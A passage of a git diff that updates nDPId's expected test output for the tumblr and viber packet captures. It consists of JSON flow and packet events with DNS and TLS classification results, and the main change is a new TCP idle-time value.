+00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":289,"flow_first_seen":1605292105170,"flow_last_seen":1605292122449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":187188,"flow_avg_l4_payload_len":647,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":326,"flow_first_seen":1605292105171,"flow_last_seen":1605292122739,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":185805,"flow_avg_l4_payload_len":569,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43602,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43602,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1605292105726,"flow_last_seen":1605292122804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":1371,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00619{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1605292105726,"flow_last_seen":1605292122804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":1371,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1605292122095,"flow_last_seen":1605292122344,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3141,"flow_tot_l4_payload_len":39546,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":55014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":55014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00571{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","packets-captured":24745,"packets-processed":24745,"total-skipped-flows":0,"total-l4-data-len":22196494,"total-not-detected-flows":0,"total-guessed-flows":38,"total-detected-flows":14,"total-detection-updates":10,"total-updates":0,"current-active-flows":0,"total-active-flows":47,"total-idle-flows":47,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":272,"global_ts_msec":1605292122899} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 24745/24745 diff --git a/test/results/viber.pcap.out b/test/results/viber.pcap.out index 0c56de73b..43eaed397 100644 --- a/test/results/viber.pcap.out +++ b/test/results/viber.pcap.out @@ -1,14 +1,14 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"viber.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"viber.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1527155638428} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155638428,"flow_last_seen":1527155638428,"flow_idle_time":7440000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":101,"midstream":1,"thread_ts_msec":1527155638428,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1527155638428,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1527155638428,"pkt":"AA6OMNv9MAdNo1+nCABFAACZvbBAAEAGio\/AqAARNAD9ZYG4EJTYH5QATQ0UaIAYAtokAwAAAQEICgAhYEL3kz3SZQAKAAAALtCh9tIA1PL3FQOheV4He+mBM0W\/i9pTb10sHI+OMXtBs1b9JHGGgzJlSCkVK80QeHWJMpbzU2NcxAJaXXoLguc1CK5osKkCx6zZTIH0SZ0piWwLO+YlPXpdR9T6nHw="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155638428,"flow_last_seen":1527155638428,"flow_idle_time":7560000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":101,"midstream":1,"thread_ts_msec":1527155638428,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1527155638428,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1527155638428,"pkt":"AA6OMNv9MAdNo1+nCABFAACZvbBAAEAGio\/AqAARNAD9ZYG4EJTYH5QATQ0UaIAYAtokAwAAAQEICgAhYEL3kz3SZQAKAAAALtCh9tIA1PL3FQOheV4He+mBM0W\/i9pTb10sHI+OMXtBs1b9JHGGgzJlSCkVK80QeHWJMpbzU2NcxAJaXXoLguc1CK5osKkCx6zZTIH0SZ0piWwLO+YlPXpdR9T6nHw="} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155638474,"flow_last_seen":1527155638474,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155638474,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1527155638474,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1527155638474,"pkt":"AA6OMNv9MAdNo1+nCABFAABAHQZAAEARnDbAqAARwKgAD7KvADUALIZ64YMBAAABAAAAAAAABWdyYXBoCGZhY2Vib29rA2NvbQAAAQAB"} 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155638474,"flow_last_seen":1527155638474,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155638474,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1527155638476,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1527155638476,"pkt":"MAdNo1+nAA6OMNv9CABFAAC9W3xAAEARXUPAqAAPwKgAEQA1sq8AqYax4YOBgAABAAMAAgACBWdyYXBoCGZhY2Vib29rA2NvbQAAAQABwAwABQABAAAK\/QAGA2FwacASwDAABQABAAADcAAMBHN0YXIEYzEwcsASwEIAAQABAAAAIgAEHw1WCMBHAAIAAQAAChUABwFiAm5zwEfARwACAAEAAAoVAAQBYcBswH0AAQABAAAKFQAERavvC8BqAAEAAQAAChUABEWr\/ws="} 00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155638474,"flow_last_seen":1527155638476,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1527155638476,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":1,"num_answers":7,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.86.8"}} -00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1527155638483,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1527155638483,"pkt":"AA6OMNv9MAdNo1+nCABFAABsvbFAAEAGirvAqAARNAD9ZYG4EJTYH5RlTQ0UaIAYAtrUUgAAAQEICgAhYFH3kz3SOAALAAAAldaoLlKjmwog1MjwGSIlPYr6Sdpf8civ07lgAXs3mNLP4I1IauuXnWuqSM\/O114Rmek="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1527155638524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155638524,"pkt":"MAdNo1+nAA6OMNv9CABFAAA0M+hAACYGLr00AP1lwKgAERCUgbhNDRRo2B+UZYAQAIxrZwAAAQEICveUYGsAIWBC"} +00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1527155638483,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1527155638483,"pkt":"AA6OMNv9MAdNo1+nCABFAABsvbFAAEAGirvAqAARNAD9ZYG4EJTYH5RlTQ0UaIAYAtrUUgAAAQEICgAhYFH3kz3SOAALAAAAldaoLlKjmwog1MjwGSIlPYr6Sdpf8civ07lgAXs3mNLP4I1IauuXnWuqSM\/O114Rmek="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1527155638524,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155638524,"pkt":"MAdNo1+nAA6OMNv9CABFAAA0M+hAACYGLr00AP1lwKgAERCUgbhNDRRo2B+UZYAQAIxrZwAAAQEICveUYGsAIWBC"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639005,"flow_last_seen":1527155639005,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1527155639005,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1527155639005,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155639005,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8HWBAAEARm+DAqAARwKgAD4nTADUAKI8By5wBAAABAAAAAAAAA2FwcAZhZGp1c3QDY29tAAABAAE="} 00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639005,"flow_last_seen":1527155639005,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1527155639005,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Advertisement"},"dns": {"query":"app.adjust.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -19,42 +19,42 @@ 00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639234,"flow_last_seen":1527155639234,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155639234,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mapi.apptimize.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1527155639237,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1527155639237,"pkt":"MAdNo1+nAA6OMNv9CABFAAFnW5VAAEARXIDAqAAPwKgAEQA19ZgBU\/qk\/WOBgAABAAkABAABBG1hcGkJYXBwdGltaXplA2NvbQAAAQABwAwABQABAAAKmgACwBHAEQABAAEAAAA7AAQ2RabiwBEAAQABAAAAOwAENrtbtsARAAEAAQAAADsABCLf10HAEQABAAEAAAA7AAQjoIExwBEAAQABAAAAOwAEI6WM3sARAAEAAQAAADsABCOitm\/AEQABAAEAAAA7AAQ2RVffwBEAAQABAAAAOwAENrpW+MARAAIAAQAAA2AAGQducy0xODgzCWF3c2Rucy00MwJjbwJ1awDAEQACAAEAAANgABcHbnMtMTEyOQlhd3NkbnMtMTMDb3JnAMARAAIAAQAAA2AAFgZucy02ODUJYXdzZG5zLTIxA25ldADAEQACAAEAAANgABMGbnMtNDczCWF3c2Rucy01OcAbwSgAAQABAAADYAAEzfvB2Q=="} 00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155639234,"flow_last_seen":1527155639237,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1527155639237,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mapi.apptimize.com","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.69.166.226"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639240,"flow_last_seen":1527155639240,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155639240,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1527155639240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155639240,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8C6FAAEAGkTrAqAARNkWm4pB6Abv8W2quAAAAAKAC\/\/9PrwAAAgQFtAQCCAoAIWEPAAAAAAEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1527155639414,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155639414,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYG9to2RabiwKgAEQG7kHpPMSQJ\/Ftqr6ASaN+BOQAAAgQFtAQCCApMsKWZACFhDwEDAwg="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1527155639417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155639417,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0C6JAAEAGkUHAqAARNkWm4pB6Abv8W2qvTzEkCoAQAq0WDQAAAQEICgAhYTtMsKWZ"} -00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155639240,"flow_last_seen":1527155639419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155639419,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155639240,"flow_last_seen":1527155639594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155639594,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1527155639240,"flow_last_seen":1527155639594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5053,"flow_avg_l4_payload_len":561,"midstream":0,"thread_ts_msec":1527155639594,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","server_names":"*.apptimize.com,apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA","subjectDN":"C=US, ST=CA, L=Mountain View, O=Apptimize, 